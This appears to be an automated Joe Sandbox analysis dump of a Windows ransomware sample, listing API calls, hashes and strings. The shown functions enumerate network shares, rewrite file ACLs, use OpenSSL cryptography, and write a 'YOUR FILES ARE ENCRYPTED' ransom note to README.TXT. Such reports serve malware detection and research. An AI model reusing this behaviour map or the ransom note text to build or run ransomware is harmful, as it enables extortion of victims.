                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 6f4d5c0c84a631fd0f0d13dbc23b33c74aec55d454b0b874cae508b181606d33
                                  • Instruction ID: 630ad50023c3f9a9b908ebffb01d24fbfd0feb16122af83cee4b6b74cdbf04a8
                                  • Opcode Fuzzy Hash: 6f4d5c0c84a631fd0f0d13dbc23b33c74aec55d454b0b874cae508b181606d33
                                  • Instruction Fuzzy Hash: 7611B975100508BFCB41EF94CC52EDD3BA6EF04351B4281A9BA1D8F222DA71DE909B84
                                  APIs
                                  • WNetOpenEnumW.MPR(00000002,00000000,00000013,?,?), ref: 005C65BC
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(992547), ref: 005C65FD
                                  • lstrcmpiW.KERNEL32(-00000004,992547), ref: 005C6612
                                  • lstrcpyW.KERNEL32(00000014,00000000), ref: 005C662F
                                  • WNetEnumResourceW.MPR(?,000000FF,00000000,00004000), ref: 005C66B1
                                  • WNetCloseEnum.MPR(?), ref: 005C66C9
                                  Similarity
                                  • API ID: Enum$AllocateCloseHeapOpenResourcelstrcmpilstrcpylstrlen
                                  • String ID: 992547$:
                                  • API String ID: 578091008-2342601241
                                  • Opcode ID: e8626485140733305340549e90cbc834adb570a2f2739f087d646e732c3ee378
                                  • Instruction ID: ae84a7793ea2047cb35c44de1fa1975ac4955d173860ef5a6aa07f12fb1288be
                                  • Opcode Fuzzy Hash: e8626485140733305340549e90cbc834adb570a2f2739f087d646e732c3ee378
                                  • Instruction Fuzzy Hash: 2131C270600209AFEB21EFE4CC59FAD7FAABF45304F24452DE5419A191EB70DB85CB50
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 005E9717
                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 005E9727
                                  • GetProcessWindowStation.USER32(?,?,?,00000003), ref: 005E974B
                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 005E9766
                                  • GetLastError.KERNEL32(?,?,?,00000003), ref: 005E9774
                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 005E97AF
                                  Similarity
                                  • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                  • String ID: Service-0x$_OPENSSL_isservice
                                  • API String ID: 1944374717-1672312481
                                  • Opcode ID: 913a5fb1ce0794239e6894fd90b0454a2e46d0910b017a47bf618138ec6b5ced
                                  • Instruction ID: 574033c1cc8a0f50b7cfc4d27f70754afbc75e5f41ae5e9e7a9f1964b2738196
                                  • Opcode Fuzzy Hash: 913a5fb1ce0794239e6894fd90b0454a2e46d0910b017a47bf618138ec6b5ced
                                  • Instruction Fuzzy Hash: D8310A31A10205ABCB24DFA9DC45BAE7BA9EF95320F10435AEC59D71D0EF3099058750
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 005E9717
                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 005E9727
                                  • GetProcessWindowStation.USER32(?,?,?,00000003), ref: 005E974B
                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 005E9766
                                  • GetLastError.KERNEL32(?,?,?,00000003), ref: 005E9774
                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 005E97AF
                                  Similarity
                                  • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                  • String ID: Service-0x$_OPENSSL_isservice
                                  • API String ID: 1944374717-1672312481
                                  • Opcode ID: e032e435a7e6425bc008612baf2a6aa63cfdf7e56c6f3a373e7bfa823d9bbdc2
                                  • Instruction ID: 02717719c93ea3b6cdda2b58dd05ae67887b2b79b5ecf5f8456f2ba396a8610e
                                  • Opcode Fuzzy Hash: e032e435a7e6425bc008612baf2a6aa63cfdf7e56c6f3a373e7bfa823d9bbdc2
                                  • Instruction Fuzzy Hash: C1212871A10305BBDB249FAADC4AFAE7BADEF56710F004229F959D71D0EF3099018750
                                  APIs
                                  • CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 005EF1E6
                                  • CertGetCertificateContextProperty.CRYPT32(?,0000000B,00000000,?), ref: 005EF22A
                                  Similarity
                                  • API ID: CertCertificateContextProperty
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_cert_get_fname
                                  • API String ID: 665277682-1657576467
                                  • Opcode ID: 2231efb16e0d37cac21298b085bac7fd34ca4f545af965674a5a39f8ac723c44
                                  • Instruction ID: e2aa1ca7fa3370c24ae5388ecbb0cb1580228509c1175c24c7d3de4cab6b13d1
                                  • Opcode Fuzzy Hash: 2231efb16e0d37cac21298b085bac7fd34ca4f545af965674a5a39f8ac723c44
                                  • Instruction Fuzzy Hash: BA21D7757407426BDA10FB68DC0BF6F7ADDBBD4B05F81042AF505DA282EB60C64447A2
                                  APIs
                                  • lstrlenA.KERNEL32(README.TXT,00000000), ref: 005CA659
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,00000000), ref: 005CA675
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,README.TXT,000000FF,?,0000000B), ref: 005CA68E
                                    • Part of subcall function 005C9FA1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000000,00000000,00000000,00000000,006D9A1C,00000000,?,005C8208,README.TXT), ref: 005C9FBF
                                    • Part of subcall function 005C9FA1: WriteFile.KERNEL32(00000000,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,?,00000000,?,005C8208,README.TXT), ref: 005C9FD8
                                    • Part of subcall function 005C9FA1: CloseHandle.KERNEL32(00000000,?,005C8208,README.TXT), ref: 005C9FDF
                                  • ShellExecuteW.SHELL32(00000000,ynw,00000005,00000000,00000000,00000005), ref: 005CA70B
                                  Strings
                                  • README.TXT, xrefs: 005CA653, 005CA658, 005CA68B
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005CA6AE
                                  • xynw, xrefs: 005CA6EB
                                  Similarity
                                  • API ID: File$ByteCharCloseCreateExecuteFolderHandleMultiPathShellSpecialWideWritelstrlen
                                  • String ID: README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$xynw
                                  • API String ID: 1498941749-273956997
                                  • Opcode ID: 738828d6740df9401153674e20c99e798f81b44ff840858d5b753ea8b0e6cd0c
                                  • Instruction ID: 3850ae81fb43420867bf03c7035b3b0575034d1f2dc13fd841651f20f05f9821
                                  • Opcode Fuzzy Hash: 738828d6740df9401153674e20c99e798f81b44ff840858d5b753ea8b0e6cd0c
                                  • Instruction Fuzzy Hash: CB21F87090828CFEEB1187A4DC88FEE7FBDAB11348F1442DAE445A7182E6755A49C731
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D9828,00000000,?,?,?,005C1AE6), ref: 005C7071
                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,?,?,005C1AE6), ref: 005C7085
                                  • GetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,?,00000000,?,?,?,005C1AE6), ref: 005C70A4
                                  • SetEntriesInAclW.ADVAPI32(00000001,006D9844,?,005C1AE6,?,?,005C1AE6), ref: 005C70BC
                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,005C1AE6,00000000,?,?,005C1AE6), ref: 005C70D1
                                  • LocalFree.KERNEL32(00000000), ref: 005C70EB
                                  • LocalFree.KERNEL32(00000000), ref: 005C70F6
                                  • LeaveCriticalSection.KERNEL32(006D9828), ref: 005C70FD
                                  Similarity
                                  • API ID: InfoNamedSecurity$CriticalFreeLocalSection$EnterEntriesLeave
                                  • String ID:
                                  • API String ID: 1879718216-0
                                  • Opcode ID: 18ea22e5de88754dc0ae7dc3deebc6e485d8b46692078b98e6b867955cac298f
                                  • Instruction ID: 782d6b2602f957edba045e992edb08bdb8b7fefdf467d5829a357afc7556822b
                                  • Opcode Fuzzy Hash: 18ea22e5de88754dc0ae7dc3deebc6e485d8b46692078b98e6b867955cac298f
                                  • Instruction Fuzzy Hash: CF112931A41228BFDB215B929C49FDFBF7EEF46B51F004155F604B51A0C6B14A45EFA0
                                  APIs
                                  • GetCommandLineW.KERNEL32(?,?,00000000), ref: 005CA7EA
                                  • lstrlenW.KERNEL32(00000000,?,?,00000000), ref: 005CA7F8
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • CommandLineToArgvW.SHELL32(?,00000000,?,?,00000000), ref: 005CA928
                                    • Part of subcall function 005C9F53: FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                    • Part of subcall function 005C9F53: FindClose.KERNEL32(00000000), ref: 005C9F70
                                  Similarity
                                  • API ID: CommandFindLine$AllocateArgvCloseFileFirstHeaplstrlen
                                  • String ID: $3$7X\
                                  • API String ID: 2342302124-916873835
                                  • Opcode ID: 08332273e5e4067df62a85be383c3aef35a9949579369f297c389140ff11c6df
                                  • Instruction ID: ab8ba6851406fdb291385935c6032d7f6ecc7dca962a4e80870e05c6f1f5c5d1
                                  • Opcode Fuzzy Hash: 08332273e5e4067df62a85be383c3aef35a9949579369f297c389140ff11c6df
                                  • Instruction Fuzzy Hash: 9D51C630E0020E9FDF159BE4C45ABBEBFB5BF85308F15806DD442A7281EB749A45CB92
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0065741D
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00657430
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: characters$ to $..\..\openssl-1.1.0f\crypto\ui\ui_lib.c$You must type in
                                  • API String ID: 601868998-1592652383
                                  • Opcode ID: 26e9e776f043a15cc4a4b7f04fb2203f7c57dbf6f6119ac0e63918739553c5c1
                                  • Instruction ID: 7b7181ac3e229ab73f539dad711bdfa269c31c345c3532de7ddcf88a37bc0830
                                  • Opcode Fuzzy Hash: 26e9e776f043a15cc4a4b7f04fb2203f7c57dbf6f6119ac0e63918739553c5c1
                                  • Instruction Fuzzy Hash: 85517B313083426FD7149F29EC82F76BBE6FF98715F80015BF889C6282EB51E5548392
                                  APIs
                                  • GetConsoleCP.KERNEL32(00000010,00000000,?,?,?,?,?,?,?,00679911,00000020,00000000,00000010,00000000,00000000,00000000), ref: 006791DE
                                  • __fassign.LIBCMT ref: 00679259
                                  • __fassign.LIBCMT ref: 00679274
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000010,00000005,00000000,00000000), ref: 0067929A
                                  • WriteFile.KERNEL32(?,00000010,00000000,00679911,00000000,?,?,?,?,?,?,?,?,?,00679911,00000020), ref: 006792B9
                                  • WriteFile.KERNEL32(?,00000020,00000001,00679911,00000000,?,?,?,?,?,?,?,?,?,00679911,00000020), ref: 006792F2
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: 747067508774f70c316076784cd7c433d7a38bc295c1c8c818892413b2672794
                                  • Instruction ID: a48ef134b5e4590f97b0aaa649d65b92de4199b69e34d40dc13279a6efbf959c
                                  • Opcode Fuzzy Hash: 747067508774f70c316076784cd7c433d7a38bc295c1c8c818892413b2672794
                                  • Instruction Fuzzy Hash: 61519471A00249AFDF10CFB8DC85AEEBBFAEF09310F14815AE959E7291D7309951CB64
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01aadfa526a978275bd462a2947a34f9965b465171147b54deac38dc76dbc6a
                                  • Instruction ID: c36ef7b3d842d635d1e7f6949e6f4474ad27c60d0db68025119a5e94d3f89056
                                  • Opcode Fuzzy Hash: f01aadfa526a978275bd462a2947a34f9965b465171147b54deac38dc76dbc6a
                                  • Instruction Fuzzy Hash: FB416171A00119ABDF208FA5CD84DEEBBBAEF49750B048619F918E6255DB31DD41CBA0
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00667067
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0066706F
                                  • _ValidateLocalCookies.LIBCMT ref: 006670F8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00667123
                                  • _ValidateLocalCookies.LIBCMT ref: 00667178
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  APIs
                                  • CertGetCertificateContextProperty.CRYPT32(005F0451,00000002,00000000,00000000), ref: 005F0C44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CertCertificateContextProperty
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x
                                  • API String ID: 665277682-3443155802
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                    • Part of subcall function 0067706E: _free.LIBCMT ref: 00677097
                                  • _free.LIBCMT ref: 006770F8
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 00677103
                                  • _free.LIBCMT ref: 0067710E
                                  • _free.LIBCMT ref: 00677162
                                  • _free.LIBCMT ref: 0067716D
                                  • _free.LIBCMT ref: 00677178
                                  • _free.LIBCMT ref: 00677183
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  APIs
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,00000124), ref: 005EC397
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,00000140), ref: 005EC45E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fflush()$fopen('
                                  • API String ID: 1452528299-2674688776
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00675DB4,00000000,?,?,?,0067B854,?,?,00000100), ref: 0067B65D
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0067B854,?,?,00000100,5EFC4D8B,?,?), ref: 0067B6E3
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0067B7DD
                                  • __freea.LIBCMT ref: 0067B7EA
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  • __freea.LIBCMT ref: 0067B7F3
                                  • __freea.LIBCMT ref: 0067B818
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0067D370
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F02C4
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005F02E8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 005F02FF
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 005F0323
                                    • Part of subcall function 005F0490: CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 005F05A0
                                    • Part of subcall function 005F0490: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F05D4
                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 005F0388
                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 005F0391
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharMultiWide$CertContext$AcquireCertificateCloseCryptErrorFreeLastStore
                                  • String ID:
                                  • API String ID: 3186997219-0
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00668058,006672CF,005D2705), ref: 0066806F
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066807D
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00668096
                                  • SetLastError.KERNEL32(00000000,00668058,006672CF,005D2705), ref: 006680E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 005CC673
                                  • SHBrowseForFolderW.SHELL32 ref: 005CC691
                                  • CoUninitialize.OLE32 ref: 005CC6EA
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 005CC6AF
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  • SHGetMalloc.SHELL32(?), ref: 005CC6C6
                                  • CoTaskMemFree.OLE32(00000000), ref: 005CC6E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: FreeHeap$AllocateBrowseFolderFromInitializeListMallocPathTaskUninitialize
                                  • String ID:
                                  • API String ID: 246964227-0
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00669D63,?,?,?,0066A36A,?,?,?,?), ref: 00674DA0
                                  • _free.LIBCMT ref: 00674DD3
                                  • _free.LIBCMT ref: 00674DFB
                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 00674E08
                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 00674E14
                                  • _abort.LIBCMT ref: 00674E1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  APIs
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005C673A
                                  • CloseHandle.KERNEL32 ref: 005C6746
                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 005C6761
                                  • CloseHandle.KERNEL32 ref: 005C676D
                                  • DeleteCriticalSection.KERNEL32(006D95B4), ref: 005C677D
                                  • CloseHandle.KERNEL32 ref: 005C6789
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CloseHandle$ObjectSingleWait$CriticalDeleteSection
                                  • String ID:
                                  • API String ID: 299037165-0
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 005D6C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                  • API String ID: 601868998-2416195885
                                  APIs
                                    • Part of subcall function 005F58B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,?,?,?,?,005EC5E1,?,?,?,?,?), ref: 005F58FB
                                    • Part of subcall function 005F58B0: GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F590D
                                    • Part of subcall function 005F58B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F592C
                                    • Part of subcall function 005F58B0: GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F5938
                                  • ___from_strstr_to_strchr.LIBCMT ref: 005EC5EB
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,0000004A), ref: 005EC60C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast$ByteCharMultiWide$___from_strstr_to_strchr
                                  • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fopen('
                                  • API String ID: 3952923578-1553173387
                                  APIs
                                  • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 005E99AE
                                  • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 005E99DC
                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 005E99E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Event$Source$DeregisterRegisterReport
                                  • String ID: OpenSSL$no stack?
                                  • API String ID: 3235303502-4104412182
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00668294,?,?,006D89C8,00000000,?,006683BF,00000004,InitializeCriticalSectionEx,006C4FF4,InitializeCriticalSectionEx,00000000), ref: 00668263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00668E60,00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002), ref: 00668ECF
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00668EE2
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00668E60,00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000), ref: 00668F05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,?,?,?,?,005EC5E1,?,?,?,?,?), ref: 005F58FB
                                  • GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F590D
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F592C
                                  • GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F5938
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F5989
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,005EC5E1,?,?,?,?,?,005F2193), ref: 005F59B3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  APIs
                                  • GetLastError.KERNEL32(00000188,?,006D9048,0066E405,006771D1,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 00674E25
                                  • _free.LIBCMT ref: 00674E5A
                                  • _free.LIBCMT ref: 00674E81
                                  • SetLastError.KERNEL32(00000000,?,?,?,00000000), ref: 00674E8E
                                  • SetLastError.KERNEL32(00000000,?,?,?,00000000), ref: 00674E97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  APIs
                                  • _free.LIBCMT ref: 0067701D
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 0067702F
                                  • _free.LIBCMT ref: 00677041
                                  • _free.LIBCMT ref: 00677053
                                  • _free.LIBCMT ref: 00677065
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  APIs
                                  • _free.LIBCMT ref: 0066976B
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 0066977D
                                  • _free.LIBCMT ref: 00669790
                                  • _free.LIBCMT ref: 006697A1
                                  • _free.LIBCMT ref: 006697B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID: ..\..\openssl-1.1.0f\crypto\evp\scrypt.c$JKb
                                  • API String ID: 3732870572-3068129427
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$0123456789ABCDEF$0123456789abcdef
                                  • API String ID: 1302938615-1078175416
                                  APIs
                                  • _strpbrk.LIBCMT ref: 006751F6
                                  • _free.LIBCMT ref: 00675313
